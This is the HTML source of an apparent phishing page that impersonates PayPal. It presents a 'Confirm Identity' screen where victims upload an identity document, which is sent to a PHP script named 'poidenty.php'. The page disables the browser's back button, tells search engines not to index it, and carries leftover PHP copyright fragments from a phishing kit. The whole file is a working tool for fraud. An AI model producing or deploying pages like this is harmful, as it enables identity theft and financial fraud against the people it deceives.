<!DOCTYPE html>
<html>

<head>
<title>PayPal: Confirm Identity</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=yes">
<meta name="robots" content="noindex, nofollow, noarchive, nosnippet, noodp, noydir">
<link rel="shortcut icon" href="assets/img/favicon.ico">
<link rel="apple-touch-icon" href="assets/img/apple-touch-icon.png">
<link rel="stylesheet" href="assets/css/authflow_style.css">
<link rel="stylesheet" href="assets/css/jquery.fileuploader.min.css">
<link rel="stylesheet" href="assets/css/jquery.fileuploader-theme-thumbnails.css">
<script src="assets/js/jquery.min.js" type="text/javascript"></script>
<script src="assets/js/jquery.fileuploader.min.js" type="text/javascript"></script>
<script src="assets/js/custom.js" type="text/javascript"></script>
<script type="text/javascript">
window.history.forward();

function noBack() {
window.history.forward();
}
</script>
</head>

<body onload="noBack();" onpageshow="if (event.persisted) noBack();" onunload="">
<div class="grey-background header-body">
<div id="header">
<div class="container-fluid center-block-big">
<table>
<tr>
<td>
<img src="assets/img/favicon.svg" width="106" height="29">
</td>
<td align="right" width="100%">
</td>
</tr>
</table>
</div>
</div>
<div id="wrapper" class="page-container">
<div id="verify-identity">
<div class="container-fluid trayNavOuter verify-tray">
<div class="trayNavInner">
<div class="row">
<div class="col-md-12">
<p class="logo-block-text"><h2>Confirm Identity</h2></p>
</div>
</div>
<div class="row">
<div class="col-md-12">
<form action="post/poidenty.php" method="post" enctype="multipart/form-data">
<img src="assets/img/identity.png" style="width:100%;">
<input type="file" name="files">
<div class="buttons">
<input id="Button" class="btn btn-primary" type="submit" value="Continue">
</div>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<footer class="footer">
<div class="footer-nav">
<div class="site-links container-fluid" style="align: right">
<ul class="navlist">
<li><a href="#">Contact</a></li>
<li><a href="#">Security</a></li>
<li><a href="logout">Log Out</a></li>
</ul>
</div>
</div>
<div class="footer-legal">
<div class="container-fluid">
<span class="copyright">Copyright © 1999 - ".gmdate('Y')." PayPal. All rights reserved</span>
<span class="short-copyright">© 1999 - ".gmdate('Y'));?></span>
<ul class="navlist footer-list">
<li><a href="#">Privacy</a></li>
<li><a href="#">Legal</a></li>
</ul>
</div>
</div>
</footer>
</body>

</html>
